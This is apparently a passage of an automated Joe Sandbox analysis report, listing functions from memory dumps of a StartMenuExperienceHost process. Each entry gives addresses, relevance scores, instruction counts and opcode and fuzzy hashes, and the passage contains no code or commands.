              Memory Dump Source
              • Source File: 0000001D.00000002.2237481243.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_7ffd34760000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 99d52f0517edc27d288604b41fca494217f6cb2de42390005c75167a9cbcdb1d
              • Instruction ID: 139eda418a5365234dc2961c51aa46bd943acf6bef8a17c883ed80c57d511891
              • Opcode Fuzzy Hash: 99d52f0517edc27d288604b41fca494217f6cb2de42390005c75167a9cbcdb1d
              • Instruction Fuzzy Hash: CA31A0A7B089178FE715BBADB4A61FD3751EF82339F040537D208CA092DE2C3499A6D4
              Function 00007FFD34761DA3 Relevance: .1, Instructions: 118COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001D.00000002.2237481243.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_7ffd34760000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 6fcf23ec00031343a93329297caf83488007ab6887e6a3cecc50a802e44351e0
              • Instruction ID: d3ab33e5bf27b21fc54387df0da4bc83255dbcc6f657a6ff8a2bf1dac8ff67f5
              • Opcode Fuzzy Hash: 6fcf23ec00031343a93329297caf83488007ab6887e6a3cecc50a802e44351e0
              • Instruction Fuzzy Hash: 8D316070B18A4A8FDB4CDE1CC8A55BA73E2FBD8355B14453ED59AD3285CE34E8128B81
              Function 00007FFD3476C5DA Relevance: .1, Instructions: 96COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001D.00000002.2237481243.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_7ffd34760000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 37cc4314f5672dfa4b668b63c712de2edd3ac4dfc4a3d98e2b19eef231df1031
              • Instruction ID: e1854bd0675fccfc4fc67e8e40d76b2c064c97122c828fb7ed4233691bcc2ae9
              • Opcode Fuzzy Hash: 37cc4314f5672dfa4b668b63c712de2edd3ac4dfc4a3d98e2b19eef231df1031
              • Instruction Fuzzy Hash: 4A2110B1F0891DCFDB94EB9898A96ECB7B2FF5A310F501139D10DD7246DE2C68419B84
              Function 00007FFD347622F9 Relevance: .1, Instructions: 86COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001D.00000002.2237481243.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_7ffd34760000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 99dcd77ebb9072a3f6750c116e9fe442c4743a55ea1b360833574b408cb3d20b
              • Instruction ID: 239256526eeffc0974e8d4b76469ecd7051a203ff0d6c84e4f8f17cf9166c6b4
              • Opcode Fuzzy Hash: 99dcd77ebb9072a3f6750c116e9fe442c4743a55ea1b360833574b408cb3d20b
              • Instruction Fuzzy Hash: AA31A1B0E1D50ACEE790EB15C8A12F873A2FF52320F10127AC65ED6192DF6C7804AAC1
              Function 00007FFD3476B2E8 Relevance: .1, Instructions: 85COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001D.00000002.2237481243.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_7ffd34760000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: b11ca0fbafa802b5339790804a0e23e696766d5677ae59fdd6f8cd5987b8b30e
              • Instruction ID: 62c53014cf322b0aeabb18f2572b5c27850a3c5b7b224591c657ff27d3efab51
              • Opcode Fuzzy Hash: b11ca0fbafa802b5339790804a0e23e696766d5677ae59fdd6f8cd5987b8b30e
              • Instruction Fuzzy Hash: 4F21C171B1891ACAEB90EB6988AC5B977E2EF4B310F0444B6D50CD7052EE3CB4448780
              Function 00007FFD3476A921 Relevance: .1, Instructions: 75COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001D.00000002.2237481243.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_7ffd34760000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 2549fbfd8f55c544d41d880656e2667d6c947a6e6472c6798f5310ebd7e599dc
              • Instruction ID: 45d718a8b805a87d3d2a597c5bcc6a198afcd5bf8c36fcdf18a336f9b0fb7f28
              • Opcode Fuzzy Hash: 2549fbfd8f55c544d41d880656e2667d6c947a6e6472c6798f5310ebd7e599dc
              • Instruction Fuzzy Hash: 01216D70A1464DCFCB85EF58C495AA93BF1FF2A314F11016AE809D3251DB38E840CB80
              Function 00007FFD34763350 Relevance: .1, Instructions: 75COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001D.00000002.2237481243.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_7ffd34760000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 313c0ce390450591ab3c07a625edb11ce38c464f6e2a8c1931d2e971de1b4f40
              • Instruction ID: 34f93c0543e748a3b4c0ba64bc6412aecacf4313f610eb1666634de6cfe9f2d4
              • Opcode Fuzzy Hash: 313c0ce390450591ab3c07a625edb11ce38c464f6e2a8c1931d2e971de1b4f40
              • Instruction Fuzzy Hash: 1C21C17194D2CA8FD782ABB888A86A57FF0FF47320F0944EAD049CB063DA2CA445D751
              Function 00007FFD3476BBAE Relevance: .1, Instructions: 66COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001D.00000002.2237481243.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_7ffd34760000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: c25b8f43f4a42ca3a81ebcb0b3ffc642404ab47e8d6ddbd7c0701e884e856037
              • Instruction ID: 0107f1261d85cbd3f4918679e56c49bfcc69782af67475b85a0d09d894f664d0
              • Opcode Fuzzy Hash: c25b8f43f4a42ca3a81ebcb0b3ffc642404ab47e8d6ddbd7c0701e884e856037
              • Instruction Fuzzy Hash: B521DCB0E1462DCEEB61EB14C8A57E977B1AF56310F1001FAD50DE6291DE3C6A84DF81
              Function 00007FFD3476AF45 Relevance: .1, Instructions: 64COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001D.00000002.2237481243.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_7ffd34760000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 9dc508f9cef11e44bf99160966ffe2ca73413707ea88d6d254fda7d281422604
              • Instruction ID: 70640a141181aaba52aa39de175425d5a3bac296e7191291d876a4489d0202a7
              • Opcode Fuzzy Hash: 9dc508f9cef11e44bf99160966ffe2ca73413707ea88d6d254fda7d281422604
              • Instruction Fuzzy Hash: DE110131B0450ACADB44EFA8D8696FEB3E4FF45305F40487AD01ED6192CE787944C680
              Function 00007FFD3476085D Relevance: .1, Instructions: 64COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001D.00000002.2237481243.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_7ffd34760000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 8aff96ac557778ee8db2b60afcd4649c149d2c3fe202f5d68e937e5c698f5d15
              • Instruction ID: 99153b0ddccac611afde11ec6d2045fcd2f7b91822abcebef204fc87a49d69fb
              • Opcode Fuzzy Hash: 8aff96ac557778ee8db2b60afcd4649c149d2c3fe202f5d68e937e5c698f5d15
              • Instruction Fuzzy Hash: 181104A1B1D6CBCEE751E77888E91A87BE1EF57320F0544B2D14CC6093EE2CB44486C0
              Function 00007FFD347634E5 Relevance: .1, Instructions: 56COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001D.00000002.2237481243.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_7ffd34760000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f5b6cb59c8c8b6f8cfd28374a366770b9646dfebde0702a13cda614247362c46
              • Instruction ID: 3743119f54e71e64ab5f248e00ac865ffca1e1ed8228040bee65fb4b01ffcbb8
              • Opcode Fuzzy Hash: f5b6cb59c8c8b6f8cfd28374a366770b9646dfebde0702a13cda614247362c46
              • Instruction Fuzzy Hash: 08118271A0868D8FEB98EF64C4A96BD7BE2FF15310F0405BED51AD3192EA3CA540C740
              Function 00007FFD3476BFC5 Relevance: .1, Instructions: 56COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001D.00000002.2237481243.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_7ffd34760000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: d591f0a031343d9b00569b572c1a0140507d3c6a47141613e26f991f5bcbf878
              • Instruction ID: 968b7a81cb16a232cb3b827c37bfc6f0cea88432ee439aea42c323d26931f748
              • Opcode Fuzzy Hash: d591f0a031343d9b00569b572c1a0140507d3c6a47141613e26f991f5bcbf878
              • Instruction Fuzzy Hash: 1A118271A0864DCFEB94EF64C8A92BD7BE1FF1A310F0108BAD519C2192DE3DA554C740
              Function 00007FFD34771221 Relevance: .1, Instructions: 56COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001D.00000002.2237481243.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_7ffd34760000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 7d9fc8e986e88cc333426115141ca52b4cfd5d0f3a156940a87d5ea9063e95d1
              • Instruction ID: 5d5d234f8aa0b21a2e4214af8f2414fdaf7fa9ddf37550aefc4dc5e681bc8768
              • Opcode Fuzzy Hash: 7d9fc8e986e88cc333426115141ca52b4cfd5d0f3a156940a87d5ea9063e95d1
              • Instruction Fuzzy Hash: 72116D70B0864D8FDB84EF64C8A92FD7BE1FF1A300F5045BAD51AD2692DE79A540C740
              Function 00007FFD34762E71 Relevance: .1, Instructions: 55COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001D.00000002.2237481243.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_7ffd34760000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 88cbf0d6f6441c11740085fe45dace4576a649d2ea209769f8a04061b946b871
              • Instruction ID: 0203d21e9de65cf42b6fbcd45833ab916295346c57a0f880d52a38569a4f03cf
              • Opcode Fuzzy Hash: 88cbf0d6f6441c11740085fe45dace4576a649d2ea209769f8a04061b946b871
              • Instruction Fuzzy Hash: 7501C4B1A0C68A8FE791FB74849C5A97BE1EF16310F0545B6D508C7093EA3CF540C780
              Function 00007FFD34761C7D Relevance: .1, Instructions: 52COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001D.00000002.2237481243.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_7ffd34760000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 4dab09baf9fdbc2686c1300d433d45c56b248c57dd2bfa00eed28dd6193bcc74
              • Instruction ID: 18b7700cf58e9d1f6b40b0ffa759398bfbab6c0559c927355c0aa1046e5f539c
              • Opcode Fuzzy Hash: 4dab09baf9fdbc2686c1300d433d45c56b248c57dd2bfa00eed28dd6193bcc74
              • Instruction Fuzzy Hash: 2F1104B0A0854DCFEB98EF14C4A95BD3BA2FF5A314F1000B9D409C6192CE3DB854DB80
              Function 00007FFD347605D8 Relevance: .0, Instructions: 50COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001D.00000002.2237481243.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_7ffd34760000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 824c0bae8dcaaf04d43640880e5b99d415d4675e20ae8572f53c2be980bb2bf2
              • Instruction ID: 6bae2322370ef9154049c4b485be1c59663b80b7052718b540ca9d52d6434a88
              • Opcode Fuzzy Hash: 824c0bae8dcaaf04d43640880e5b99d415d4675e20ae8572f53c2be980bb2bf2
              • Instruction Fuzzy Hash: 8D014C70A0890ECEEB98EF24C0A96BD77A2EF5A315F50457AD40ED2191CA39B554DB80
              Function 00007FFD3476AF75 Relevance: .0, Instructions: 50COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001D.00000002.2237481243.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_7ffd34760000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a641320859cfa6f165fdcd350d79ff2a850d6367a3bbfa6d4954b0510067f1ee
              • Instruction ID: c2c35bad0d996004976aa6883ce3d6115d3a779a463846ee4f134c065d43325e
              • Opcode Fuzzy Hash: a641320859cfa6f165fdcd350d79ff2a850d6367a3bbfa6d4954b0510067f1ee
              • Instruction Fuzzy Hash: DF01F172B1851ACEE714EF78E8A51FD73A4EF02325F40853BE148C6092CA7879589680
              Function 00007FFD3476D9AD Relevance: .0, Instructions: 50COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001D.00000002.2237481243.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_7ffd34760000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 88511828cd484e47790b9b8c87e643c975f4cf2bb1594ade0ef01b45edde3ab0
              • Instruction ID: 40abc2b44694dcdd7a9089dda6436f692d3991318cbf2cba8e0f197893451827
              • Opcode Fuzzy Hash: 88511828cd484e47790b9b8c87e643c975f4cf2bb1594ade0ef01b45edde3ab0
              • Instruction Fuzzy Hash: CC11A170A1C64D8FDB94EF64C4A92BD7BF1FF1A310F0105BED50AD2192DA39A550C780
              Function 00007FFD3476284D Relevance: .0, Instructions: 49COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001D.00000002.2237481243.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_7ffd34760000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ef18bf11e89655c25044b684faacdbc83f6b698c31713dfa3ad0b0d22dd0b325
              • Instruction ID: de99f14429cff57bc23cee0823b25347c55763869c6b0dfbf635c9f2859f81b4
              • Opcode Fuzzy Hash: ef18bf11e89655c25044b684faacdbc83f6b698c31713dfa3ad0b0d22dd0b325
              • Instruction Fuzzy Hash: 2C01D2B1A0868A8FE7D5FB6888985A97BE1EF5A310F0544B6D50CCB093EE3CF5408381
              Function 00007FFD3476AFBD Relevance: .0, Instructions: 45COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001D.00000002.2237481243.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_7ffd34760000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 25a16412741221192453f7a5d7119c954cc927603058ba4f6a3d9236414d7484
              • Instruction ID: 5dc239c587d8547512951bcf628565c92bafb596b881b7685e4cf19300c2a858
              • Opcode Fuzzy Hash: 25a16412741221192453f7a5d7119c954cc927603058ba4f6a3d9236414d7484
              • Instruction Fuzzy Hash: E301F772B1C54ADEE710DA749CA51FE77A4EF06301F40447AE42CC2081DAB87614E690
              Function 00007FFD34762EE9 Relevance: .0, Instructions: 44COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001D.00000002.2237481243.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_7ffd34760000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 2f1a5e01bc22a0c5255d2a01fc85438bfcb7af72a2425f4d44f6e6f519eb7945
              • Instruction ID: 1df323b413f0a72f378b47a78bf73afa8ed01b02ee63c594f01a38c32f316e6d
              • Opcode Fuzzy Hash: 2f1a5e01bc22a0c5255d2a01fc85438bfcb7af72a2425f4d44f6e6f519eb7945
              • Instruction Fuzzy Hash: 9B019E71A0D6498FE792AB7484A91E97BE1EF4B310F4504B6C508C60A2DA3CB444CB81
              Function 00007FFD34760608 Relevance: .0, Instructions: 42COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001D.00000002.2237481243.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_7ffd34760000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: b7b2b32a3582718ed8739f7000a559596a7400ed7ef6fdf374a4fa6ab17143c8
              • Instruction ID: 1426afb5509305a7ccb211317861d11ae2c32fab1ebe50e5aee3f800cb1f9d2e
              • Opcode Fuzzy Hash: b7b2b32a3582718ed8739f7000a559596a7400ed7ef6fdf374a4fa6ab17143c8
              • Instruction Fuzzy Hash: C0016D70A1450ECEEB98FB64C4A86BA73A5FF19315F10487ED50ED25D1DE3DB550C640
              Function 00007FFD34760610 Relevance: .0, Instructions: 42COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001D.00000002.2237481243.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_7ffd34760000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 10206a194cf4529626fb0690d2ced1f6bbc6b56376ce71695ed843909abd8c2e
              • Instruction ID: 2b5cdbb314eb340c7ef4bae348a5183bb502fe89196041c1b622a9a2bd007dad
              • Opcode Fuzzy Hash: 10206a194cf4529626fb0690d2ced1f6bbc6b56376ce71695ed843909abd8c2e
              • Instruction Fuzzy Hash: 3A016D70A18A0ECAEB99EB64C4A82B973A1FF1A315F10487ED40ED21D1DF3EB550D680
              Function 00007FFD3476CCD8 Relevance: .0, Instructions: 40COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001D.00000002.2237481243.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_7ffd34760000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 13b001e2f5e83704b3f54312c1312e99ae14c6f45446a586de8fef05eac42634
              • Instruction ID: 093e0d5e4997fc28e4df2a544cf45869b4d3151970d80d9dfa6a28f130e365fd
              • Opcode Fuzzy Hash: 13b001e2f5e83704b3f54312c1312e99ae14c6f45446a586de8fef05eac42634
              • Instruction Fuzzy Hash: 13016D71A0964ACFEB94AF68C4A92FA7BE0FF06310F00047AE91CC2151EB7C6560E780
              Function 00007FFD3476AE7B Relevance: .0, Instructions: 38COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001D.00000002.2237481243.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_7ffd34760000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 7f6827ebbf616c0a493045bea16f47d85230498fb6c9a05c441342f8fddb80ef
              • Instruction ID: 58b4bc4db42bce1e0c8e3f2cfcb7ac5be1ba1b0c0e8a749b731431a0f126d3da
              • Opcode Fuzzy Hash: 7f6827ebbf616c0a493045bea16f47d85230498fb6c9a05c441342f8fddb80ef
              • Instruction Fuzzy Hash: 0BF04F75B5C60EDEEBA1EB7884DA5E977E2EF5B310F0048B2D609C2052EE3CB554D680
              Function 00007FFD34762769 Relevance: .0, Instructions: 35COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001D.00000002.2237481243.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_7ffd34760000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 769aa6c9e9b09ab6ebabccba1e282fc72c005755c6d65638ddda5d990ef3f65b
              • Instruction ID: 34bf149a8ad42c491216f2b0bbffc0ab737ec8963901c0439e5220849291bdca
              • Opcode Fuzzy Hash: 769aa6c9e9b09ab6ebabccba1e282fc72c005755c6d65638ddda5d990ef3f65b
              • Instruction Fuzzy Hash: 06F0C27190E3898FEB99AF2488B52A93B65FF07210F4504BAD609C65D2DB3CB414C791
              Function 00007FFD34771240 Relevance: .0, Instructions: 32COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001D.00000002.2237481243.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_7ffd34760000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 197d385a76f99e7ef28cd1d064e66e81216ec0b48007c5aeaf1a41e2ce6fb45a
              • Instruction ID: a68b6243881e0b636dfb4be9146e8a7ddd419f499cbb8b3ec8e953a6dd57be26
              • Opcode Fuzzy Hash: 197d385a76f99e7ef28cd1d064e66e81216ec0b48007c5aeaf1a41e2ce6fb45a
              • Instruction Fuzzy Hash: 85F05E70A1850E8EEB84EF6898582FE76A0FF16304F40453AE91DC2290DF786550C781
              Function 00007FFD347627DD Relevance: .0, Instructions: 31COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001D.00000002.2237481243.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_7ffd34760000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f2cf91c1ef79bce41fb7b4995ea95f499ec608fa871a69c6569096fada2f4fc8
              • Instruction ID: 6bf333d018652f39b065d39ff357f37c345d7bbfdec964a06f09fb6390295b53
              • Opcode Fuzzy Hash: f2cf91c1ef79bce41fb7b4995ea95f499ec608fa871a69c6569096fada2f4fc8
              • Instruction Fuzzy Hash: F7F0F670A0D78A8FEB99AF2488692B93BA1BF06310F0005BAD50DC20D2DB3DA414C340
              Function 00007FFD34762377 Relevance: .0, Instructions: 24COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001D.00000002.2237481243.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_7ffd34760000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: fd4cc68147644ff0e5eb38d5a1cb17687d365162a51c6ce629e85ea5a38aeb38
              • Instruction ID: b7c6ad8af65af4d2be1ada6f19ec96c8f7933978f31fa5c7ffd297754e00fd81
              • Opcode Fuzzy Hash: fd4cc68147644ff0e5eb38d5a1cb17687d365162a51c6ce629e85ea5a38aeb38
              • Instruction Fuzzy Hash: 89F05E70A0865ACFDB60EB14C8907A873A2FB51320F0002AAC54AD3292DFBC29859B41
              Function 00007FFD3476BCCA Relevance: .0, Instructions: 14COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001D.00000002.2237481243.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_7ffd34760000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 24e3bd2f08a1b5c816ae065b5a375c273a4dfdfaaae09844531df1f311ea2da4
              • Instruction ID: 371ff6bc888ee2b3f46d1b3e64a1aff2b2daa0411301d8454f64a53f19239d1f
              • Opcode Fuzzy Hash: 24e3bd2f08a1b5c816ae065b5a375c273a4dfdfaaae09844531df1f311ea2da4
              • Instruction Fuzzy Hash: 1AD0126094C41BC9DBA0E614C494EFC72659B16300F2095B1810DD2082DD3C79C46B80

              Non-executed Functions

              Function 00007FFD3476F6AD Relevance: 8.9, Strings: 7, Instructions: 102COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 0000001D.00000002.2237481243.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_29_2_7ffd34760000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID: $"$=$C$Y$[$]
              • API String ID: 0-3933176780
              • Opcode ID: 8fbcbdb5e738ad5c909ba9bcf5f59c111f8c688160aba50262e2c24df3cc0ea5
              • Instruction ID: 77f193a7cd8110fb0f099e9adc04f857b777fb7c3ac60b301325a9a71fb20258
              • Opcode Fuzzy Hash: 8fbcbdb5e738ad5c909ba9bcf5f59c111f8c688160aba50262e2c24df3cc0ea5
              • Instruction Fuzzy Hash: 1F41B6B0E1962ACFDBA4DF14C8947E9B7B2AF15315F0004FAD10DE6281DB786A84DF81

              Executed Functions

              Function 00007FFD3477CAA9 Relevance: .4, Instructions: 438COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001E.00000002.2233201695.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_7ffd34770000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 300ce7fd3b16ebd53b88995034bc8dfbd0ed0aa261b355fd22eb831715ddde08
              • Instruction ID: 5c46c938763b2a04d5931f1aae643ecc08c79256f7b65c447ef74c6f83e020bc
              • Opcode Fuzzy Hash: 300ce7fd3b16ebd53b88995034bc8dfbd0ed0aa261b355fd22eb831715ddde08
              • Instruction Fuzzy Hash: 09D1C1A7B0C6629FE31166ACB8A50FD7F50EF87375B488077D38CCA093995D344A92E1
              Function 00007FFD34773565 Relevance: .3, Instructions: 304COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001E.00000002.2233201695.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_7ffd34770000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 82505169faa8bca1d526ec66376dd3874ab99d401ea371fe4c66180f19e09902
              • Instruction ID: 621f4bd878d4d76512a152066a28db311d3c8843304f65cab8855c10da2036a7
              • Opcode Fuzzy Hash: 82505169faa8bca1d526ec66376dd3874ab99d401ea371fe4c66180f19e09902
              • Instruction Fuzzy Hash: 3DA17071A1894E8FEB94DB6888657BD7BE1FF5A314F80417AD00ED32D6DBA86801C781
              Function 00007FFD3477DD31 Relevance: 2.8, Strings: 2, Instructions: 253COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 0000001E.00000002.2233201695.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_7ffd34770000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
